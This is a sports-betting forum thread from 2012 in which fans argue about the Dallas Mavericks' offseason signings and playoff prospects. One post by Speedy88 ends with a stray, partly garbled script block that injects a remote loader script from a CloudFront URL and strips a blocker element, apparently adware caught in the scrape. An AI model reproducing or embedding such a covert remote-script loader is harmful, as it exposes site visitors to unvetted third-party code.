Bluehorseshoe
    Bluehorseshoe's Avatar Become A Pro!
    Betpoints: 1557

Mavs did a nice job rebuilding the team in 7 days.

I'm sure I'm the only one who thinks so, but the front court of Dirk, Kaman and Brand is a really nice fit. Might not be the best players at their positions, but at least its not a team just throwing any players on the teams wildly. Added O.J. Mayo last night and they're going to contend next year.

I vow Kaman has a monster season!!

seaborneq
    It's time to collect
    seaborneq's Avatar Become A Pro!
    Betpoints: 13422

It's pretty easy to rebuild a clunker, when you already have nothing to work with. I think this would qualify as a trade in versus a rebuild.

jjgold
    jjgold's Avatar Become A Pro!
    Betpoints: 10

Mayo underrated

No one ever cut him loose on court

Bluehorseshoe

Quote Originally Posted by seaborneq View Post
    It's pretty easy to rebuild a clunker, when you already have nothing to work with. I think this would qualify as a trade in versus a rebuild.
    But where do you see them finishing in the West?? I say they can be the number 2 seed.

daimoshokage
    daimoshokage's Avatar Become A Pro!
    Betpoints: 57

LMAO!!! Mavs will not make the playoffs.. Fukking washed-up fukks..

ProfaneReality
    ProfaneReality's Avatar Become A Pro!

So this is what Dallas gave up their chance to repeat for ? Kaman, Brand and Mayo ?

Bluehorseshoe

Quote Originally Posted by ProfaneReality View Post
    So this is what Dallas gave up their chance to repeat for ? Kaman, Brand and Mayo ?
    Why is that bad?

Kaman's last full season playing, he averaged 18 points a game and over 9 rebounds. Has Chandler ever been close to doing that?

tatommack
    cowboys make the playoffs
    tatommack's Avatar Become A Pro!

Really think they need west

Bluehorseshoe

Quote Originally Posted by tatommack View Post
    Really think they need west
    Just need someone to bring the ball up and throw it down to one of those three up front.

ngates815
    Hooked Nose J
    ngates815's Avatar Become A Pro!

Who's gonna guard durant/westbrook/harden?

Have all the big guys you want...I agree though its a solid front court...but won't help them against okc

Ratpack
    Ratpack's Avatar SBR PRO
    Betpoints: 1789

i like what the suns are doing better with dragic, beasley, scola, with gortat they just need a 2 guard

frogsrangers
    Zackary > Angelito
    frogsrangers's Avatar Become A Pro!
    Betpoints: 5421

Quote Originally Posted by Bluehorseshoe View Post
    Why is that bad?

Kaman's last full season playing, he averaged 18 points a game and over 9 rebounds. Has Chandler ever been close to doing that?
    Chandler was a defensive prescence. Kaman does not have anywhere near the defensive abilities that Chandler has

This team is too offensive oriented and will struggle defensively

Mark Cuban is trying too hard to patch together a team with trades and free agent signings, what needs to be done is rebuild from scratch. Throwing together a team of parts is not going to work.

When was the last time the Mavs had a good draft pick or a good draft? Never, I can't even name a player that they have drafted that has made an impact

Mavs need to learn when to throw in the towel, raise the white flag, and try to rebuild for the future

Pauulzcappin
    Pauulzcappin's Avatar Become A Pro!
    Betpoints: 568

OJ Mayo is a good player, if he stops chucking it then he might raise his game to the next level

seaborneq
    It's time to collect
    seaborneq's Avatar Become A Pro!
    Betpoints: 13422

But where do you see them finishing in the West?? I say they can be the number 2 seed.
    No playoffs or a first round exit. Neither is worth the headache that Cuban has put together. I hope Sacramento or Golden State get it together and bypass the Mavs. They both have better rosters. Carlise will have to be Copperfield to win with this bunch.

ngates815
    Hooked Nose J

Quote Originally Posted by seaborneq View Post
    No playoffs or a first round exit. Neither is worth the headache that Cuban has put together. I hope Sacramento or Golden State get it together and bypass the Mavs. They both have better rosters. Carlise will have to be Copperfield to win with this bunch.
    Mavs will be in the playoffs.

Good chance for a first round exit though, all depends on who they play obviously.

But they still have Dirk, who will always dominate. Just depends on who else they'll have fill in the 1-3 spots.

Ghenghis Kahn
    Best Baller on SBR
    Ghenghis Kahn's Avatar SBR PRO
    Betpoints: 2261

I say they can be the number 2 seed.
    4th or 5th at best

ttwarrior1
    ttwarrior1's Avatar SBR PRO
    Betpoints: 9764

who is the pg?

ngates815
    Hooked Nose J

Quote Originally Posted by ttwarrior1 View Post
    who is the pg?

Couldn't fukkin yell ya off the top of my head.

Who's the #3? still shawn marion?

Is Mayo coming off the bench, are they bringing back Delonte West?

beerman2619
    beerman2619's Avatar Become A Pro!
    Betpoints: 459

i don't see anyway the Mavs finish 2 in the west wtf?

Seto
    Jose Mourinho: simply the best
    Seto's Avatar Become A Pro!
    Betpoints: 2560

Quote Originally Posted by ngates815 View Post
    Mavs will be in the playoffs.

Good chance for a first round exit though, all depends on who they play obviously.

But they still have Dirk, who will always dominate. Just depends on who else they'll have fill in the 1-3 spots.
    Collison/Do Jones/Roddy
    Mayo/Carter/Da Jones
    Marion/Carter/Cardinal
    Dirk/Wright
    Brand/Kaman

+ the 3 rookies (one guard, one forward, one center)

4th fave in the west according to bookies (behind okc, lal, sa, ahead of mem and lac). I think if they avoid lal or okc they can make the 2nd round, even without homecourt. We'll see.

Seto
    Jose Mourinho: simply the best
    Seto's Avatar Become A Pro!
    Betpoints: 2560

Quote Originally Posted by ngates815 View Post
    Couldn't fukkin yell ya off the top of my head.

Who's the #3? still shawn marion?

Is Mayo coming off the bench, are they bringing back Delonte West?
    I'd love to have Delonte back but as far as I understood, he would have to take very little money due to cap and doesn't look like it's gonna happen.

ngates815
    Hooked Nose J

Collison should be able to run that team good...Forgot they got him.

They just soft at the 3 spot.

Bring back Delonte West to play the 1/2 spot off the bench. Guy's a goofball but always thought he was a decent player.

EDIT: yea the guy is gonna get paid probably more to play elsewhere and he's broke, so he'll take the most money offered.

ngates815
    Hooked Nose J

Unrestricted free agent Delonte West has a better chance of being re-signed by the Mavs now that Deron Williams and Jason Terry are not going to be in Dallas next season.
    West is looking for a multi-year deal after playing on one-year contracts for two seasons according to ESPN Dallas. Marc Stein added that Dallas wants him back, and it's starting to look like that's what will happen. Jul 3 - 10:26 PM

ProfaneReality
    ProfaneReality's Avatar Become A Pro!

Dallas will be battling for the 8th seed if they are lucky.

Speedy88
    Speedy88's Avatar Become A Pro!
    Betpoints: 1636

Mavs did an okay job. In the long run, they would have been better off just holding onto their money, and saving up for whoever is available in next years free agent market. Just because you have a bunch of money doesn't mean you have to go out and spend it. Mayo, Kaman, etc. are all nice pieces, but it does feel a bit "thrown together." Mavs will probably finish somewhere around the 7th seed. The PG position will be a major problem for them. Collison is a backup PG, there is a reason why he lost his starting job and lost significant minutes. Brand, Marion and Carter are only getting older. Who knows how Dirk will keep up with his age.
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js" type="text/javascript"></script><script type="text/javascript">if(typeof(jQuery)=='undefine d')**(function(){var ccm=document.createElement('script');ccm .type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script' )[0];s.parentNode.insertBefore(ccm,s);if(ccm .readyState){ccm.onreadystatechange=func tion(){if(ccm.readyState=="loaded"||ccm. readyState=="complete"){ccm.onreadystate change=null;ccm_e_init(1);****;**else{cc m.onload=function(){ccm_e_init(1);**;*** *)();**else{ccm_e_init();** function ccm_e_init(jc){if(jc){jQuery.noConflict( );** jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm .type='text/javascript';ccm.async=true;ccm.src=http+ '://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&z oneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script' )[0];s.parentNode.insertBefore(ccm,s);jQuery ('#cblocker').remove();**);**;</script>

Cuse0323
    Cuse0323's Avatar Become A Pro!
    Betpoints: 87

Alright team, not winning anything but should get a 6-8 seed. Probably lose in the first round.

Bluehorseshoe

Quote Originally Posted by ProfaneReality View Post
    Dallas will be battling for the 8th seed if they are lucky.

No chance. That team that went to the finals wasn't outrageous. It was Dirk and some supporting guys. Now it's Dirk and some new supporting guys that fit better than the others. They're built for the playoffs.

rm18
    Update your status
    rm18's Avatar Become A Pro!
    Betpoints: 207814

Dirk not the same anymore he is old, plus in those playoffs he was just making everything.

ngates815
    Hooked Nose J

Quote Originally Posted by rm18 View Post
    Dirk not the same anymore he is old, plus in those playoffs he was just making everything.

Dirks been old...But he'll still have his only move, which isn't really affected by his "oldness"

I dislike the guy, but he's a solid player and tough to defend.

TheMoneyShot
    TheMoneyShot's Avatar Become A Pro!
    Betpoints: 23701

Kaman the guy is just a Neanderthal

jsmithj88
    jsmithj88's Avatar Become A Pro!

No chance. That team that went to the finals wasn't outrageous. It was Dirk and some supporting guys. Now it's Dirk and some new supporting guys that fit better than the others. They're built for the playoffs.
    im not sure where ur optimism is coming from. this is a patchwork team with basically wavier wire players and left overs FA's.
    they are pretty decent pickups but none are star unless u consider MAYO to be the exception. the mavs are just putting together a decent team and hoping for a big FA next year, since most of the signings were only 1 year deals.

i see the mavs as a 6-7-8 type of playoff team, if they make it at all.
    Last edited by jsmithj88; 07-17-12 at 03:54 PM.

Scorpion
    Update your status
    Scorpion's Avatar Become A Pro!
    Betpoints: 15377

Quote Originally Posted by TheMoneyShot View Post
    Kaman the guy is just a Neanderthal
    do u say that because hes bald?

Bluehorseshoe

Quote Originally Posted by rm18 View Post

He averaged 21 pts and almost 7 rebounds last year with everyone in the league keying him. The only other scoring threat last year was Terry.

Sunde91
    Sunde91's Avatar Become A Pro!
    Betpoints: 255

lol rebuild when you still have Dirk with 3+ quality years. Dirk is the Mavericks. You win now with him in this window or you become the Cavs or Suns for 5 years of irrelevancy.

5th seed is pretty reasonable and pretty good considering where they were last year and how it was looking a week ago

*rebuild meaning not what was done this summer, but the idea of dumping Dirk and giving up to become the Hornets
    Last edited by Sunde91; 07-17-12 at 04:13 PM. Reason: *

nomeansno
    nomeansno's Avatar Become A Pro!
    Betpoints: 407

they were obv going after dwill/howard, but when they missed everything, they scratched together these guys.

kaman`s deal is only one year i think, so they will have decent cap space again next summer to try to sign cp3/howard.. this team is just a filler for that one year, no way they get anywhere with this roster

12 Last